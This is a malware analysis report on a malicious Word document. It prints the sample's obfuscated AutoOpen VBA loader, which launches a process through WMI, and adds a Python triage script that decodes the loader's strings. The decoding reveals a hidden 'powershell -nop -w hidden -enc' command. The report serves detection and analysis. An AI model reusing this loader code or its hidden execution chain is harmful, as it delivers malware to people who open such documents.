Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1de94318f7810c1…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 205.0 KB
Created (document metadata): 2018-04-25 10:12:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: d108c5cf5aefafc55348dad0748c3d86
SHA-1: 144ee8fd9501edd68a444c237b80e550fe4e1c3a
SHA-256: f1de94318f7810c14430add3c348e442f9d9914cdcefcad907a28096794975f2
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains a heavily obfuscated VBA macro with an AutoOpen entry point, a common loader technique. Every meaningful string is rebuilt at runtime by a custom decoder function (YdoQa) from literals that carry no recognizable token, so CreateObject, Shell and URL indicators never appear in the macro source; the decoder itself is cut off in the preview below. The helper functions qvtIi and lzWLxBExN ignore the argument they are passed ("IHLAwWqOqoH"), which is a decoy. The decoded strings are handed to GetObject, and the returned object is driven through a Get() / SpawnInstance_ / .ShowWindow / .Create(command, Null, startupInfo, processId) sequence. That call shape is the calling convention of the WMI Win32_Process.Create method, which lets the macro launch a process without Shell or WScript.Shell and would additionally map to T1047 (Windows Management Instrumentation). The launched command line is assembled from five concatenated literals in lzWLxBExN and decoded only at runtime, so the exact command, and any URL it carries, is not visible in the source. As cover, AutoOpen deletes the first paragraph of the document and replaces it with the text "Decryption failed" / "ErrCode:0x05". The structure and the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics indicate a downloader or dropper.

Heuristics (7)

  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    An auto-exec VBA routine reconstructs its strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so here the marker reflects the AutoOpen name already covered by OLE_VBA_AUTOOPEN rather than a WordBasic-only document.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    All seven are XML namespace identifiers (XMP, RDF, Dublin Core, Photoshop and DrawingML schemas) carried in embedded image and drawing metadata. None is reached from the macro, and they should not be treated as network indicators.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4505 bytes
SHA-256: f44803d0129098abbf4ce06c96d26c2408893b96258a18d25e8aa74d5d4fe57a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"





Sub AutoOpen()
    Dim JCkxoRBPynMExQ As String
    Dim gsRJcVnw As Object
    Dim iztHUFEfusHPmmlWcqiCfcac As Integer
    Dim dzBMNIYcZgZdyZI As String
    Dim KWevsQeOpnmAPmRl As String
    Dim rngFirstParagraph As Range
    Dim sID As String
    Set rngFirstParagraph = ActiveDocument.Paragraphs(1).Range
    With rngFirstParagraph
        .Delete
        .InsertAfter Text:="Decryption failed" & Chr(10)
        .InsertAfter Text:="ErrCode:0x05" & Chr(10)
        .InsertParagraphAfter
        With .Font
            .Name = "Century"
            .Size = 12
        End With
    End With
    iztHUFEfusHPmmlWcqiCfcac = 9716
    KWevsQeOpnmAPmRl = qvtIi("IHLAwWqOqoH")
    Set gsRJcVnw = GetObject(KWevsQeOpnmAPmRl)
    dzBMNIYcZgZdyZI = lzWLxBExN("IHLAwWqOqoH")
    dzBMNIYcZgZdyZI = JpeNvwoLgvTSxK(gsRJcVnw, dzBMNIYcZgZdyZI, iztHUFEfusHPmmlWcqiCfcac)
End Sub

Function lzWLxBExN(qFIlBjXodohTRCfHDRST As String) As String
    Dim MOZdAWNIwbLzgfJWlu As String
    Dim HraTLBiqV As String
    Dim jsBVeahIKWU As String
    jsBVeahIKWU = "vu}kxynkrr4k~k&3tuv&3}&nojjkt&3kti&PGH7GNOGhGG?GIOGgGH6GNWGiGH GJuGR}G|GNiGj}H9GI:GgmHnGMWGhGGzGM>GimG{GMSGh}HzGI>Gj}HrGMOGjWHvGI:G_}H|GM:G`mGoGJyGQGHUGM[Gj}GzGK>G_mHwGM[G_}H6GIGG[}H;GNSGjGHrGM6GRmHUG"
    Dim OajBM As String
    OajBM = "M[GjGG{GLiG`WHoGKSGhGHvGM[GhmH6GIqGRmHKGM>Gj}H{GM}Gh}HnGMWGXmHvGM}G`WGuGIWGjWH GM}GRGGqGM[GhmH8GJuG\GHrGM6GiGGxGIiG^GHJGM>GhWH}GN[GjGHrGNOGRmH8GMOGi}GtGIqGU}GqGNSGjGHnGNOGjGH\GNGGXmH|GM}G`GHrGNOGOGG?G"
    Dim qxHCvXFxjlcacDy As String
    qxHCvXFxjlcacDy = "IGGOmGqGK[GhmH8GJuGWWHWGLGGXGHHGLWGWWHiGK6GgWHpGNOGh}H GM>G`mH6GL}G\}HvGM:G`GH|GNiGi}HiGLSGjGHnGNOGjGGmGK6G`WH{GN[G^GHWGNOGh}HtGNOG_WHzGNSG^GHZGNWG_WH GNWGjWH}GIOGU}GqGNWG`WHzGNGGVWGoGIWGXWH{GN_GUmH6G"
    Dim kFhIJ As String
    kFhIJ = "M[GhWH}GL}GW}H|GM6GiGH7GNWG`WH GI:GjmHoGNSGOmG=GMSGi}HpGNOGgWH}GNWGOGGqGNWG`WHzGNGGU}HJGM>GiGH;GI6GYWH6GM[GhWGmGIWGjGHrGM6GiGGmGIWGi}H6GMKGimH6GL[GiGHMGM>GhGHqGM[GimG=GLOG`WHzGM>GjmHrGI6GYWH6GM[GhWGmG"
    Dim MRrpF As String
    MRrpF = "IWGjGHrGM6GiGG=GGCC"

    MOZdAWNIwbLzgfJWlu = jsBVeahIKWU & OajBM & qxHCvXFxjlcacDy & kFhIJ & MRrpF
    MOZdAWNIwbLzgfJWlu = YdoQa(MOZdAWNIwbLzgfJWlu)
    lzWLxBExN = MOZdAWNIwbLzgfJWlu
End Function

Function ZMxwQzU() As String
    Dim PloKBTmiiWQIpTTTLk As String
    PloKBTmiiWQIpTTTLk = YdoQa("}otsmszy@xuuz5ios|8")
    ZMxwQzU = PloKBTmiiWQIpTTTLk
End Function

Function JpeNvwoLgvTSxK(gJyAaTKda As Object, LYrDQtTPFRlS As String, shnIviWG As Integer) As String
    Dim mBeuYtzxKFJZdSQvxWdHosh As String
    Dim XetxVOaoktUrHUgMmMDYpku As Integer
    Dim YLNZqCoH As Integer
    Dim ulWhTLJ As Integer
    XetxVOaoktUrHUgMmMDYpku = 6
    mBeuYtzxKFJZdSQvxWdHosh = LYrDQtTPFRlS
    If (shnIviWG > XetxVOaoktUrHUgMmMDYpku) Then
        Set KzvmfJNmAskYGYTvumBkTV = GetObject(ZMxwQzU())
        Set RYNGHXPC = KzvmfJNmAskYGYTvumBkTV.Get(YdoQa("]ot98eVxuikyyYzgxz{v"))
        Set lRqRoVGNdqgKwBayUgKuAKk = RYNGHXPC.SpawnInstance_
        XetxVOaoktUrHUgMmMDYpku = shnIviWG - shnIviWG
        XetxVOaoktUrHUgMmMDYpku = XetxVOaoktUrHUgMmMDYpku + 12
        lRqRoVGNdqgKwBayUgKuAKk.ShowWindow = XetxVOaoktUrHUgMmMDYpku
        ulWhTLJ = gJyAaTKda.Create(mBeuYtzxKFJZdSQvxWdHosh, Null, lRqRoVGNdqgKwBayUgKuAKk, YLNZqCoH)
    End If
    mBeuYtzxKFJZdSQvxWdHosh = "sIxvKuspx"
    JpeNvwoLgvTSxK = mBeuYtzxKFJZdSQvxWdHosh
End Function

Function qvtIi(ttYImzolfjXPQ As String) As String
    Dim UCJVWDU As String
    UCJVWDU = YdoQa("}otsmszy@]ot98eVxuikyy")
    qvtIi = UCJVWDU
End Function


Function YdoQa(dzLwQuGAOBlnQ As String) As String
    Dim SPolvBuDKMPTKDs As Long
    Dim mXuOsnwWjVrqSp As String
    Dim MWCzHkgMsGNFqetTefS As Integer
    Dim int1 As Integer
    MWCzH
... (truncated)
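The following triage script is an added example for this report; it is not the analyzer's own tooling or code from the sample. It runs against a constructed, abridged copy of the macro shown above (the AutoOpen entry point, the three decoder-fed literals and the start of the five-part command literal) and does two things: it scores the 'obfuscated auto-exec loader' shape on the raw source without decoding anything, and it derives the string decoder by brute force. The decoder is an assumption: YdoQa's body is truncated in the preview, so the script assumes it is a fixed per-character code shift and accepts a shift only if it turns a GetObject argument into a WMI moniker. The helper names (triage, find_shift, shift_decode, decode_literals, wmi_artifacts, decode_encoded_command) and the sink list are the example's own, not the analyzer's heuristic implementation.

```python
"""Triage helper written for this report page (not the analyzer's tooling).

Assumption: YdoQa() is a fixed per-character code shift. Its body is cut off
in the macro preview, so the shift is derived by brute force below instead of
being read from the source.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed, abridged copy of the extracted macro. The command literal is
# cut at a base64 quartet boundary; the original continues further.
MACRO_EXCERPT = r'''
Sub AutoOpen()
    KWevsQeOpnmAPmRl = qvtIi("IHLAwWqOqoH")
    Set gsRJcVnw = GetObject(KWevsQeOpnmAPmRl)
    dzBMNIYcZgZdyZI = lzWLxBExN("IHLAwWqOqoH")
    dzBMNIYcZgZdyZI = JpeNvwoLgvTSxK(gsRJcVnw, dzBMNIYcZgZdyZI, 9716)
End Sub
Function lzWLxBExN(q As String) As String
    jsBVeahIKWU = "vu}kxynkrr4k~k&3tuv&3}&nojjkt&3kti&PGH7GNOGhGG?GIOGgGH6GNWG"
    lzWLxBExN = YdoQa(jsBVeahIKWU)
End Function
Function ZMxwQzU() As String
    ZMxwQzU = YdoQa("}otsmszy@xuuz5ios|8")
End Function
Function JpeNvwoLgvTSxK(g As Object, cmd As String, n As Integer) As String
    Set svc = GetObject(ZMxwQzU())
    Set cls = svc.Get(YdoQa("]ot98eVxuikyyYzgxz{v"))
    Set si = cls.SpawnInstance_
    si.ShowWindow = 12
    rc = g.Create(cmd, Null, si, pid)
End Function
Function qvtIi(t As String) As String
    qvtIi = YdoQa("}otsmszy@]ot98eVxuikyy")
End Function
'''

AUTOEXEC = re.compile(
    r"\bSub\s+(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open)\b", re.I)
SINKS = {  # execution / COM-instantiation sinks (example's own list)
    "GetObject": re.compile(r"\bGetObject\s*\("),
    "CreateObject": re.compile(r"\bCreateObject\s*\("),
    "Shell": re.compile(r"\bShell\s*\("),
    "WMI SpawnInstance_": re.compile(r"\.SpawnInstance_\b"),
    "WMI .Create()": re.compile(r"\.Create\s*\("),
}
LITERAL = re.compile(r'"([^"\r\n]{8,})"')  # quoted literals of 8+ characters


def triage(src: str, long_literal: int = 40) -> Dict[str, object]:
    """Score the loader shape on raw VBA source, without decoding anything."""
    entry = AUTOEXEC.search(src)
    sinks = [name for name, pat in SINKS.items() if pat.search(src)]
    opaque = [lit for lit in LITERAL.findall(src) if len(lit) >= long_literal]
    return {
        "autoexec": entry.group(1) if entry else None,
        "sinks": sinks,
        "opaque_literals": len(opaque),
        "loader_shape": bool(entry and sinks and opaque),
    }


def shift_decode(s: str, shift: int) -> str:
    """Undo a per-character code shift (the assumed behaviour of YdoQa)."""
    return "".join(chr((ord(c) - shift) % 256) for c in s)


def find_shift(sample: str, marker: str = "winmgmts:") -> Optional[int]:
    """Brute-force the shift: a GetObject argument should become a WMI moniker."""
    for shift in range(1, 256):
        if shift_decode(sample, shift).lower().startswith(marker):
            return shift
    return None


def decode_literals(src: str, shift: int) -> Dict[str, str]:
    """Decode every long quoted literal in the source with the derived shift."""
    return {lit: shift_decode(lit, shift) for lit in LITERAL.findall(src)}


def wmi_artifacts(decoded: Dict[str, str]) -> List[str]:
    """Keep decoded values that name a WMI moniker, class or launched command."""
    return sorted(v for v in decoded.values()
                  if re.match(r"(?i)winmgmts:|win32_|powershell", v))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover a PowerShell -enc argument (base64 of UTF-16LE). Only whole
    base64 quartets are decoded, since the literal above is cut short."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    b64 = m.group(1)
    b64 = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(b64).decode("utf-16-le", errors="ignore")


if __name__ == "__main__":
    print(triage(MACRO_EXCERPT))
    shift = find_shift("}otsmszy@]ot98eVxuikyy")
    print("shift =", shift)
    decoded = decode_literals(MACRO_EXCERPT, shift)
    for value in wmi_artifacts(decoded):
        print(" ", value)
    cmd = next(v for v in decoded.values() if v.startswith("powershell"))
    print("  -enc payload starts:", decode_encoded_command(cmd))
```

Under this assumption the brute force lands on a shift of 6, the three short literals become winmgmts:Win32_Process, winmgmts:root/cimv2 and Win32_ProcessStartup, which is exactly the object chain the .Get / SpawnInstance_ / .Create calls need, and the command literal opens with powershell.exe -nop -w hidden -enc followed by base64 whose UTF-16LE payload begins $url="htt. Only that prefix is reproduced here: the preview above renders the rest of the literal with at least one character the shift would map outside printable ASCII, so the tail is unreliable as extracted, and no URL is reconstructed. If the assumption holds, the sample also maps to T1047 (WMI) and T1059.001 (PowerShell) in addition to T1059.005.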